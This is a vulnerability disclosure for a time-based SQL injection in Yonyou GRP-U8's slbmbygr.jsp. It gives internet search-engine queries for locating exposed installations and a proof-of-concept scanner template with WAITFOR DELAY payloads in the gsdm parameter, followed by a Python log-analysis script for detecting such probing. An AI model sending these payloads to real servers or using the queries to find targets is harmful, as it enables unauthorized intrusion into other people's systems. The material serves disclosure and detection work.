Vulnerability description
The slbmbygr.jsp page of Yonyou GRP-U8 has a SQL injection vulnerability in its request parameter: Yonyou GRP-U8 does not effectively filter user input and concatenates it directly into the SQL query string, so the system is exposed to SQL injection.
Fofa: app="用友-GRP-U8"
Hunter: app.name="用友GRP-U8 OA"
ZoomEye: app:"用友GRP-U8"
id: yonyou-grp-u8-slbmbygr-jsp-sqli

info:
  name: 用友GRP-U8 slbmbygr.jsp 存在sql注入漏洞
  author: Y3y1ng
  severity: critical
  verified: true
  description: |
    在用友GRP-U8的slbmbygr.jsp 参数存在SQL注入漏洞,由于用友GRP-U8未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。
    Fofa: app="用友-GRP-U8"
    Hunter: app.name="用友GRP-U8 OA"
    ZoomEye: app:"用友GRP-U8"
  reference:
    - https://mp.weixin.qq.com/s/sN1JUyPV6WP_RsQIPElYmw
  tags: yonyou,u8,sqli
  created: 2023/12/10

rules:
  r0:
    request:
      method: GET
      path: /u8qx/slbmbygr.jsp?gsdm=1';WAITFOR DELAY '0:0:10'--
    expression: response.status == 200 && response.latency <= 12000 && response.latency >= 10000
  r1:
    request:
      method: GET
      path: /u8qx/slbmbygr.jsp?gsdm=1';WAITFOR DELAY '0:0:6'--
    expression: response.status == 200 && response.latency <= 8000 && response.latency >= 6000
  r2:
    request:
      method: GET
      path: /u8qx/slbmbygr.jsp?gsdm=1';WAITFOR DELAY '0:0:10'--
    expression: response.status == 200 && response.latency <= 12000 && response.latency >= 10000
  r3:
    request:
      method: GET
      path: /u8qx/slbmbygr.jsp?gsdm=1';WAITFOR DELAY '0:0:6'--
    expression: response.status == 200 && response.latency <= 8000 && response.latency >= 6000

expression: r0() && r1() && r2() && r3()
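The rules above confirm the flaw from the defender-visible side effects: a stacked `WAITFOR DELAY` in the `gsdm` parameter and a response time that lands inside the expected window. The same two signals can be used to find this probing in web server logs. The script below is an added example for detection, not code from the original page or from the Yonyou product; the log lines are constructed, and it assumes an nginx-style access log whose last field is the request time in seconds (the path and parameter name come from the POC above).

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined format plus a trailing
# request-time field in seconds, as nginx's $request_time would log it).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2023:10:00:01 +0800] "GET /u8qx/slbmbygr.jsp?gsdm=1001 HTTP/1.1" 200 512 0.031
10.0.0.9 - - [10/Dec/2023:10:00:02 +0800] "GET /u8qx/slbmbygr.jsp?gsdm=1%27%3BWAITFOR+DELAY+%270%3A0%3A10%27-- HTTP/1.1" 200 512 10.042
10.0.0.9 - - [10/Dec/2023:10:00:13 +0800] "GET /u8qx/slbmbygr.jsp?gsdm=1%27%3BWAITFOR+DELAY+%270%3A0%3A6%27-- HTTP/1.1" 200 512 6.038
10.0.0.7 - - [10/Dec/2023:10:00:20 +0800] "GET /u8qx/index.jsp HTTP/1.1" 200 2048 0.012
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \d+ (?P<rt>[\d.]+)$'
)
# T-SQL time-delay primitive as used in the POC: WAITFOR DELAY 'h:m:s'
DELAY_RE = re.compile(r"WAITFOR\s+DELAY\s+'(\d+):(\d+):(\d+)'", re.IGNORECASE)
# A quote-terminated value followed by a statement separator (stacked query).
STACKED_RE = re.compile(r"'\s*;")


def parse_line(line):
    """Split one access-log line into fields and decode its query string."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    url = urlsplit(entry["target"])
    entry["path"] = url.path
    # parse_qs percent-decodes and turns '+' into spaces, so the payload reads as sent.
    entry["params"] = {k: v[0] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    entry["status"] = int(entry["status"])
    entry["rt"] = float(entry["rt"])
    return entry


def waitfor_seconds(value):
    """Return the delay requested by a WAITFOR DELAY clause, or None."""
    m = DELAY_RE.search(value)
    if not m:
        return None
    h, mi, s = (int(x) for x in m.groups())
    return h * 3600 + mi * 60 + s


def inspect_request(entry, path="/u8qx/slbmbygr.jsp", param="gsdm", slack=2.0):
    """Flag a request to the vulnerable page whose parameter carries a delay or stacked query.

    'confirmed' mirrors the POC's latency window: the server answered 200 and took
    between N and N+slack seconds for a requested delay of N seconds.
    """
    if entry is None or entry["path"] != path or param not in entry["params"]:
        return None
    value = entry["params"][param]
    delay = waitfor_seconds(value)
    stacked = bool(STACKED_RE.search(value))
    if delay is None and not stacked:
        return None
    confirmed = (delay is not None and entry["status"] == 200
                 and delay <= entry["rt"] <= delay + slack)
    return {"ip": entry["ip"], "value": value, "delay": delay,
            "rt": entry["rt"], "confirmed": confirmed}


def scan(log_text):
    """Run inspect_request over every line and return the findings."""
    return [f for f in (inspect_request(parse_line(l)) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with `confirmed` set is the server-side evidence that the injected delay was executed, which is exactly what the POC's latency windows test for; an unconfirmed finding still records an attempt and is worth correlating by source address. Patching the page to use a parameterized query removes the timing side channel entirely, at which point only the attempt signal remains.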